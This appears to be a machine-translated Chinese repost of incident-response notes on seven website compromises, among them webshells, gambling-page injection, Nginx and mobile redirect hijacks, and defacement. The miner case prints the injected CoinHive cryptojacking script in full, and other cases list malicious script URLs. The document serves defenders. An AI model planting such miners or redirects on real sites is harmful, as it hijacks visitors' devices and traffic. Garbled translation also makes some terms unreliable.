紧急响应系列网络战斗文章

发布者:上海IT外包来源:http://www.lanmon.net点击数:1093

当我还在工作时,我的主要工作是渗透测试和应急响应。两年前,我开始着手解决一些紧急响应案例,对保留特定功能的场景进行脱敏,并尝试以最简单,最直观的方式恢复紧急场景。
现在,我将以另一种更开放的形式分享这些文件,欢迎来到Star,并欢迎这个问题。
GitHub地址:https://github.com/Bypass007/Emergency-Response-Notes
GitBook地址:https://bypass007.github.io/Emergency-Response-Notes/
项目介绍
面对各种安全事件,我们应该怎么做?
这是一个关于安全事件应急响应的项目,从系统入侵到事件处理,收集和整理一些案例进行分析。
我将继续更新本说明,希望能帮助那些有需要的人。
如果您看到一个好的案例,请随时通过问题提交,并欢迎Star支持。
第1部分:Web站点嵌入在Webshell中
该网站嵌入在webshell中,这意味着该网站存在高风险漏洞。攻击者利用此漏洞入侵网站并写入webshell以接管网站。为了获得许可,传统的方法是:前后任何文件上传,远程命令执行,Sql注入和写入文件。
现象描述
网站管理员在网站目录中找到了一个webshell,并开始分析入侵过程。
Webshell杀毒工具:
在Shieldhell kill下的D Shield _Web杀死窗口:http://www.d99net.net/index.asp
Hippo:支持多种平台,但需要联网环境。
如何使用: wgethttp://down.shellpub.com/hm/latest/hm-linux-amd64.tgz tar xvf hm-linux-amd64.tgz hm scan/www
2.事件分析
(1)定位时间范围
从发现的webshell文件创建一个时间点,并查看相关日期的访问日志。(2)Web日志分析
日志分析后,在创建文件时未发现可疑上载,但发现了可疑的Web服务接口。
(3)漏洞分析
访问webservice接口并查找变量:buffer,distinctpach,newfilename可以在客户端上自定义
(4)漏洞再现
尝试重现漏洞,成功上传webshell,控制Web服务器
(5)错误修复
清除webshell并修复webservice接口的代码。
从发现webshell到日志分析,再到漏洞再现和修复,本文不涉及可追溯性取证。
第2部分:梦露的恶意挖掘
Monroe(Xero)或XMR,一种加密数字货币,专注于隐私,匿名和不可跟踪性。只需在网页中配置js脚本并打开要浏览的网页即可。这是一种非常简单的挖掘方法。通过这种恶意挖掘获取数字货币是黑人和灰色行业获得收入的重要途径。
现象描述
使用XMR恶意挖掘会消耗大量的用户CPU资源,严重影响网站的用户体验。
从08/09的0:00开始,LAN中的IP访问网站页面将触发安全警报。只要您访问此服务器上的网页,CPU就会上升100%。
2.问题分析
通过获取恶意网页网址,对网页进行分析,发现网站页面嵌入在线门罗采矿代码中:
var script=document.createElement('script'); script.onload=function(){//XMR Pool hash var m=new CoinHive.Anonymous('BUSbODwUSryGnrIwy3o6Fhz1wsdz3ZNu'); //TODO:将以下字符串替换为钱包字符串m .start('47DuVLx9UuD1gEk3M4Wge1BwQyadQs5fTew8Q3Cxi95c8W7tKTXykgDfj7HVr9aCzzUNb9vA6eZ3eJCXE9yzhmTn1bjACGK');}; script.src='https://coinhive.com/lib/coinhive.min.js'; document.head.appendChild(script);js中的恶意代码被删除,网站被XMR恶意挖掘,服务器受到攻击,服务器被进一步调查。
第3部分:批量黑页
作为网站管理员,你使用开源CMS来做网站,比如dedecms,但是有一天,你突然发现,当网站的友情链接模块被挂起了很多垃圾链接时,网站上有很多不应该的目录在那里。这是一个与赌博有关的网页。此外,在攻击者挂起黑色页面后,他将在一些小型论坛中注册该背心,并将您网站的黑页链接发送到论坛以吸引爬虫。当搜索引擎搜索网站地址时,会出现一些投注页面,这严重影响了网站的图像。
原因分析
网站中存在高风险漏洞,这在一些具有安全漏洞的开源CMS中很常见。他们使用0day批量上传黑页。
2.现象描述:
一个网站被绞死了许多赌博链接。链接如下:
http://www.xxx.com/upload/aomendduchangzaixiandobo/index.html
http://www.xxx.com/upload/aomendduchangzaixian/index.html
http://www.xxx.com/upload/aomenzhengguidubowangzhan/index.html
可以访问该链接,可以通过访问物理路径直接看到该文件,但是在网站目录中找不到这些文件。隐藏这些文件在哪里?
访问这些链接并跳转到如下所示的页面:
3.问题处理:
(1)打开“计算机文件夹”选项卡,取消选中“隐藏受保护的操作系统文件”,然后选择“隐藏文件和文件夹”下的“显示隐藏文件,文件夹和驱动器”。
(2)再次查看,可以看到半透明文件夹,清楚地隐藏文件夹和所有页面
(3)然后清除IIS临时压缩文件
C: \ inetpub \ temp \ IIS临时压缩文件\ WEBUI $ ^ _ gzip_D ^ \ WEB \ WEBUI \ UPLOAD
(4)投诉快照,申请删除相关网页,减少对网站的影响。
第4部分:新闻来源网站劫持
新闻源网站通常具有较高的权重,速度快,并且可以优先包含在搜索引擎中。它是促进黑人和灰人生产的战场,很容易成为攻击的目标。被黑客入侵后的不良信息主要内容主要是博彩彩票等赌博内容。新闻源网站程序是黑客攻击,无论是自行开发还是开源,开源程序更容易被黑客入侵。1.现象描述:
一则新闻来源网站主页广告链接被劫持到菠菜网站
有三个广告主题,链接形式如下:
http://www.xxx.cn/zhuanti/yyysc/index.shtml
http://www.xxx.cn/zhuanti/wwwsc/index.shtml
http://www.xxx.cn/zhuanti/zzzsc/index.shtml
点击这三个链接将带您进入投注站点。简单的捕获分析过程:
可以发现此返回页面已被劫持并加载了第三方js文件,http://xn--dpqw2zokj.com/N/js/dt.js
进一步访问该文件:
Dt.js进一步加载了另一个js,访问:http://xn--dpqw2zokj.com/N/js/yz.js
我们找到了跳转到https://lemcoo.com/?dt的链接
进一步访问此链接,该网站是一个投注链接导航网站,访问后将随机跳转到第三方赌博网站。
2.问题处理:
找到与该URL对应的文件位置。即使删除了文件,仍然可以访问该链接。您可以发现所有三个链接都以“sc”为后缀。
对Nginx配置文件进行故障排除,发现Nginx配置文件VirtualHost.conf已被篡改,带有“sc”后缀的目标链接与反向代理匹配,并被劫持到http://103.233.248.163。该网站是一个赌博链接导航网站。
删除恶意代理后,将恢复主题链接访问。
第5部分:移动劫持
PC访问正常,移动访问异常。例如,插入弹出窗口,嵌入广告以及跳转到第三方网站会干扰用户的正常使用并对用户体验造成极大的危害。
现象描述
一些网站用户反馈,手机将打开网站,并将跳转到赌博网站。
2.问题处理
访问该网站的主页并获取恶意js:http://js.zadovosnjppnywuz.com/caonima.js
我们可以发现攻击者通过这个js代码判断手机访问源,劫持移动终端(如手机,ipad,Android等)的流量,跳转到
https://262706.com
进一步访问https://262706.com跳转到赌博网站:
第6部分:搜索引擎劫持
当您直接打开URL访问网站时,这是正常的,但是当您在搜索引擎结果页面中打开网站时,您将跳转到其他一些网站,如投注,虚假广告,淘宝搜索页面等。是的,您可能遇到过搜索引擎劫持。现象描述
自动从搜索引擎跳转到指定的页面
2.问题处理
通过对index.php文件的代码分析,发现文件代码被Sogou和Good Search劫持了访问。
进一步遵循include函数中包含的文件,索引,php包含/tmp/.ICE-unix/./c.jpg。
转到/tmp目录查看它,发现该目录(如c.jpg和其他文件)包含一组赌博劫持程序。
第7部分:网站的主页已被篡改
主页已被非法篡改。是的,您知道当您打开网站时,您的网站存在安全问题。网站程序中存在严重的安全漏洞。攻击者通过上传脚本特洛伊木马来篡改网站内容。在某些情况下,此篡改事件将无限放大。
现象描述
网站的主页被恶意更改,例如复制原始图像,PS,然后替换它。
2.问题处理
(1)确认篡改时间
通过检查伪造的图片,确认图片篡改时间是2018年4月18日19: 24: 07。
(2)访问日志可追溯性
通过图片修改的时间节点,发现可疑IP:113.xx.xx.24(代理IP,无法跟踪真实源),访问image.jsp(脚本木马),然后访问被篡改的图片地址。
进一步检查所有日志文件(日志保存时间从2017-04-20到2018-04-19),发现只有两次访问image.jsp文件的记录是2018-04-18和2017-09- 21。
Image.jsp已在2017-09-21之前上传到Web服务器,并且已被隐藏超过半年或更长时间。
(3)找到真相
我们在网站的根目录中找到了答案,发现站点目录中有一个ROOT.rar全站点源备份文件。备份时间为2017-02-28 10: 35。
通过解压缩ROOT.rar,发现源代码中的脚本木马与网站访问日志(image.jsp)的可疑文件名一致。
基于这些时间节点,我们尝试恢复攻击者的攻击路径。
但是,我们没有在访问日志中找到ROOT.rar的访问下载记录。访问日志只保存了近一年的记录,这个webshell可能已存在多年。
黑客如何获得webshell?
可能是通过下载ROOT.rar全站点源备份文件来获取其中存在的木马信息,或者几年前入侵和隐藏数年,或者从地下黑色生产中购买shell,我们这样做不知道。在本文的例子中,攻击者给我们留下了大量的证据和记录,而且更多的时候,攻击者可能会清除所有关键信息,这将不可避免地增加调查人员的难度。
IT外包
>
400-635-8089
立即
咨询
电话咨询
服务热线
400-635-8089
微信咨询
微信咨询
微信咨询
公众号
公众号
公众号
返回顶部